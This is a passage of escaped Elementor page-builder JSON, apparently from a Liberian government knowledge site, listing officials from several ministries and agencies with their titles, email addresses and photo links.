href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a 